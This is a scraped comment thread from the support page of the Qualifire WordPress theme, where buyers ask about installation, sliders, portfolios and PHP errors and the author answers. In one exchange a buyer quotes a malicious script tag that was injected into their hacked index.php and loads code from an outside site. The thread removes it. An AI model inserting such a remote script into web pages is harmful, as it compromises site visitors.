1181 comments found

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years

Hi, we purchased and implemented Qualifire; however, the site header area does not display properly at all in Internet Explorer.

We have tried different logo sizing, reducing navigation categories and removing the tagline – nothing helps, it must be the theme itself.

Can you please assist?

http://europeanhomecollection.com
  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
internq7

Hi,

if you view the source of your site you’ll see some JavaScript inserted before everything else, which is not appropriate, not sure if you did that or your site has been hacked, but you should remove everything before the <!DOCTYPE ... tag. You might have to edit the theme’s “header.php” file for that.

Regards

Default-user

Hi internq7, thanks so much – yes it appears that someone hacked the index.php file! They put this line of code there:

<script type=”text/javascript” src=”http://abrahamspath.org.uk/cb.php”></script>

Crazy, I removed and it appears good in IE now! Thanks.

internq7

Glad you sorted it out. Make sure you keep your QualiFire theme up to date, here’s the instructions how to update to the latest version 1.3.0 which was updated on: 02.07.2012: http://themeforest.net/item/qualifire-wordpress-theme/105879/faqs

Also, might want to change your passwords after that just in case.. ;)

Cheers

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
alxme Purchased

i am trying to upload this theme to wordpress, and i get “Failure Notice”. please assist on installation procedures.

Thanks

internq7

Hi,

Thank you for choosing my theme!

You were supposed to unzip the initial zip file you downloaded after purchase onto your hard drive and then inside you would find Documentation and another zip file called ‘qualifire.zip’ which is the actual theme. Please refer to the Documentation for installation instructions.

If you end up doing the FTP method to install the theme then make sure the directory path to the theme files look like this:
wp-content/themes/qualifire/
Here’s also a video on how to install ThemeForest themes: http://support.envato.com/index.php?/Knowledgebase/Article/View/269/0/my-wordpress-theme-isnt-working-what-should-i-do

Regards

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
alxme Purchased

Thank you for the fast reply, i just figured it out, Thanks

internq7

Great!! :)

  • Bought between 10 and 49 items
  • Has been a member for 7-8 years
  • United States

I don’t need any help, just wanted to comment on this Author. I’m very impressed not only with his work, but his customer support is EXACTLY what everyone would expect.

If your on the fence on whether or not you would want to buy this theme, or any themes offered by this gentlemen, his customer support and follow-up is second to none.

Thanks Internq7 for all your hard work! It’s very much appreciated!

internq7

Hi ThemeKings,

thanks for the kind words, glad you like the theme and support I provide. :)

Best Regards,
Andon

  • Bought between 10 and 49 items
  • Has been a member for 3-4 years
jkrross Purchased

Hi

Iim trying to use the theme with Xili Language, and i cannot make it work together, menu show all languages.

http://marbella-forum.com
internq7

Hi,

you need to setup the translations to work with a plugin for WordPress, like qTranslate or WPML plugins. Have a look: http://codex.wordpress.org/WordPress_in_Your_Language

Regards

  • Bought between 10 and 49 items
  • Has been a member for 1-2 years

Hello, I really enjoy the theme. How do I embed a Video onto a post. I tried to use the typical You Tube embed code and it does not work. What is the procedure for added Videos to pages if you are not using the Video portfolio page.

Also, I noticed the videos on the demo site on the video portfolio page only play sound. The videos do not show up.

Thanks, Dale

internq7

Hi,

it should work, give it another try, also look up some WordPress plugins for embedding video, they might make the process a little easier.. :)

Cheers

Default-user

totally my fault, I entered the code in the visual area instead of the Text (HTML) area. Everything works fine. Thanks. Great Theme and Great Support!

internq7

Great!! Thanks for following up :)

Regards

  • Bought between 1 and 9 items
  • Has been a member for 3-4 years
ronpeled Purchased

Hi,

Great work! Will you update the theme to be responsive so it shows properly on mobile devices as well?

Thanks!

internq7

Hi,

no plans for not, but maybe in the future. Alternatively, there are services like http://www.dudamobile.com/ that you could use as well.

Regards

  • Bought between 10 and 49 items
  • Has been a member for 1-2 years

I want to have a blog page but also maintain the standard Home Page using the Homepage Widgets. However, under the reading settings, for me to set up the blog page I must select a static page – my blog page – which is fine but then it also asks me to select a Home page – since the home page is actually built using widgets, there is no page associated with the Home Page to select here.

If I select a Blog Page and leave the Front Page blank the setup does not work and If I select a blog page and create a Home page, I lose the home page widgets on the Homepage and the Homepage widgets now show up on the blog page…please help. Sorry, I am sure it is something simple.

internq7

Yes, it’s either one, you can either have widgetized home page or a static page, you can’t have both. However there are plugin that will allow you to convert any widget to shortcode so you could use widgets in regular pages, just Google search them.

Regards

  • Bought between 1 and 9 items
  • Has been a member for 3-4 years
ronpeled Purchased

Hi Again,

How can I modify the theme so instead of assigning an image to my blog posts by using the ‘postImage’ custom field I can use the now relatively straight forward featured image way of associating an image with a post?

Was this addressed already somewhere?

FYI – I need this so my posts will work nicely with certain plugins.

Thanks!

internq7

Hi,

this feature is not supported with the theme, you’ll have to use the “postImage” custom field method.

Regards

  • Bought between 10 and 49 items
  • Has been a member for 2-3 years
  • United States
tarynike Purchased

Hi, I’m having problems creating the Portfolio page(s). I’ve created a Portfolio page and have assigned the correct page template to it. I’ve created a post with the Portfolio category assigned to it. However, in the Qualifire Options Portfolio section, the part where you can assign the categories to the pages is still missing. I’ve followed the documentation and the video, but can’t figure out what I’m missing or doing wrong. Please help?

Thanks!

internq7

Hi,

make sure that Post you created is “Published”, that’s really important especially if this Post is the only post you have assigned to that category, because otherwise WordPress will consider this Category Empty and hide it.

Regards

tarynike
tarynike Purchased

Hmmm, it is published. I’ve included a couple screen shots of what I’ve got behind the scenes…not making sense to me why the category options aren’t showing up in the Qualifire Options Portfolio section. The post I published showed up in my Blog section, even though the Blog category is not assigned to it.

http://overwatchcolorado.com/wp-content/uploads/2013/02/Video-Portfolio-Page-Setup.png

http://overwatchcolorado.com/wp-content/uploads/2013/02/Post-for-Video-Portfolio-Category.png

http://overwatchcolorado.com/wp-content/uploads/2013/02/Qualifire-Options-Portfolio-Section.png

internq7

I need to further investigate, please email me backend admin access to your site. You can send me an email through my Profile page.

Thanks

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
  • India

Do let me know when you make it responsive … great theme :-)

internq7

OK, thanks

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
BureauJ Purchased

Hi!

I’m trying to change the slider’s images it seems that the changes never apply ?! I upload them correctly and then save the changes, but they don’t show up on the slider.

My other question is still about the slider. How come my pictures always go over the frame at the bottom when they stop moving?

You can take a look at www.solutionstoiture.com Thanks, Julie

internq7

Hi,

make sure your images are all the same width and height and matching the width and height required by the slider. Something often not given enough attention to is caching!! Make sure after you do the changes that you clear the cache and “hard” refresh the page in your browser to be able to see the changes right away. If you’re not sure how to “hard” refresh a page in the specific browser you’re using, just Google it and you’ll find instructions how to do that. Also, don’t forget if you have any Caching WordPress plugins installed to also either clear their cache or disabled them for the time being altogether. This site has some great tutorials on how to clear your cache: http://www.refreshyourcache.com/en/home/

Regards

  • Bought between 10 and 49 items
  • Has been a member for 3-4 years

2 problems; maybe related?:

1st- my submenu width is not displaying the entire submenu context. I tried to change to the submenu width in scripts.js but it doesn’t help or change anything.

2nd- most of my fonts are larger than usual…. text under the banner, page title, post title, etc.

internq7

Hi,

yes, I think it is related, this sounds like your JavaScript is not working. Make sure you have the latest version of the theme v.1.3.0, also could be a plugin causing a conflict, to test this possibility disable all plugins and then test it again. If it works then start enabling the plugins one by one and do a test in between until you find the culprit.

Regards

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years

I want to take the date off the blog posts. How do I do that?

internq7

Hi,

email me with your proof of purchase and I’ll see what I can do for you. You can send me an email through my Profile page.

Regards

  • Bought between 100 and 499 items
  • Has been a member for 3-4 years
mgtinc Purchased

I am getting an error on the Options page and read its because of php_mbstring not being installed, this is on a windows host so can you please let me know if there is anything that can be done before I have to go through the painstaking task of migrating to a Linux solution?

Fatal error: Call to undefined function mb_convert_encoding() in \wp-content\themes\qualifire\sliders\piecemaker\piecemakerXML.php on line 3

Thank you

internq7

Hi,

the problem comes from the fact that your PHP setup it’s missing an extension called “php_mbstring”.
Please, contact tech. support at your hosting company and tell them about this extension missing, they should be able to help you enable it. Here’s more info on this, looks like other people had a similar problem with a plugin: http://wordpress.org/support/topic/plugin-tweetstream-fatal-error-call-to-undefined-function-mb_convert_encoding


Even on IIS server I would think there should be a way to enable this extension for PHP, I’m not sure, I’m not a server admin, but I hope this is not just PHP Linux extension. I’m running WAMPServer on my computer that I use for testing, and I can add any PHP extension I want with it no problem, I’m not sure though about IIS.

Regards

Default-user
mgtinc Purchased

They told me they cannot turn it on and to contact you to see if there was anything you could do.

internq7

OK, email me and I’ll see if I can figure something. You can send me an email through my Profile page

Thanks

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years

Hi,

I have a question about the qualifire home page. I’m brand new to wordpress and themes etc, but I’m currently doing up a website for my daughters swim club and the plan is to allow a couple of volunteers to update some of the static content on the home page. I was hoping to setup a page that the volunteers could update in the pages view of wordpress and then display that page in the Home Page Column 1 using a widget. Is this possible with the qualifire theme or is this more of a wordpress thing that I need to research some more?

Thanks

internq7

Hi,

if you would like you could setup any Page as home page, and of course when you do that the slider will still be present above the page. To do that Go to Settings -> Reading -> A static page (select below) -> Front page: -> Choose your page from the dropdown menu.

Otherwise, if you would still like to use widgets for the home page and not a regular page, but yet you would prefer to have a “Visual” editor for the “Text” widgets so they are easy to work with for whoever is going to update those widget areas, that’s that same editor used when you edit a Page or Post, I would recommend you to us this plugin: http://wordpress.org/extend/plugins/black-studio-tinymce-widget/

Regards

  • Bought between 1 and 9 items
  • Has been a member for 2-3 years
Zero8nl Purchased

Hello,

Nice template! I have a problem getting the Google map in. I cant find the right code to put into the Widget? Can you point me into the right direction?

Kind regards

internq7

Hi,

check out the documentation of the theme under the “Contact Page” section more specifically. Google might have changed their Map page a bit since i did those screenshots but should not be that far off, you should be able to figure it out.

Regards

  • Bought between 10 and 49 items
  • Has been a member for 4-5 years
bdeforest Purchased

Hi,

I’m having a problem with the large images loading after clicking on a thumbnail from a gallery page.

See http://paintingbyvic.com/margate-house-painting-project/ and click on the link. Is there a setting I’m missing? The link above is a post.

internq7

Hi,

it’s because you need to add link="file" so the shortcode becomes
[gallery link="file"]

For more info check out: http://codex.wordpress.org/Gallery_Shortcode

Regards

Default-user
bdeforest Purchased

Thanks!

Can I remove the sidebar from the portfolio posts? I see where I can position left or right, but I’d like to remove entirely.

Also, what custom fields should I use to show a thumbnail for the portfolio post and have it click to the actual post and not the large image?

See http://paintingbyvic.com/house-painting-portfolio/. Thumbnails are created from the custom code thumbURL.

internq7

Both these are not an option with this theme. If you want to link to the actual post then add some description which will add the “Read more..” link and the title will link to it as well automatically.

Regards

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
chnatasa Purchased

Hello!

I have bought this theme but I have a problem on uploading it in Wordpress. I’ve tried to upload an other one which is free and it works just fine. Can you pls help me?

Thank you!

internq7

Hi,

Thank you for choosing my theme!

You were supposed to unzip the initial zip file you downloaded after purchase onto your hard drive and then inside you would find Documentation and another zip file called ‘qualifire.zip’ which is the actual theme. Please refer to the Documentation for installation instructions.

If you end up doing the FTP method to install the theme then make sure the directory path to the theme files look like this:
wp-content/themes/qualifire/
Here’s also a video on how to install ThemeForest themes: http://support.envato.com/index.php?/Knowledgebase/Article/View/269/0/my-wordpress-theme-isnt-working-what-should-i-do

Regards

Default-user
chnatasa Purchased

Hello!!! THANK YOU very much for answering so soon!!! And very nice theme by the way…i really love it!

internq7

Great!! Glad you love it… :)

Cheers

Default-user
chnatasa Purchased

Hey again!

I have a problem with the portfolio page. The images are ok but the description that i’m writing is missing. what should i do to make it visible??

Thanx!!

internq7

Hi,

make sure you add those descriptions using the proper custom fields, keep in mind that those custom fields are case-sensitive. Also, check out this video, Portfolio Section setup: http://www.youtube.com/watch?v=BD3NUW4w3Cw&fmt=22

Regards

Default-user
chnatasa Purchased

Hi again and thank you for all the help!

All the site has be done but I have a problem with the information tab at the home page. I write my text in greek but it doesn’t work! Is there a plugin that I can use for this??

regards

internq7

Hi,

I’m not sure I understand which information tab are you referring to? Please clarify.

Regards

Default-user
chnatasa Purchased

Hi,

I mean at the slider, at the information tab.

internq7

OK, please email me a link to your site and I’ll have a look. You can send me an email through my Profile page

Regards

by
by
by
by
by
by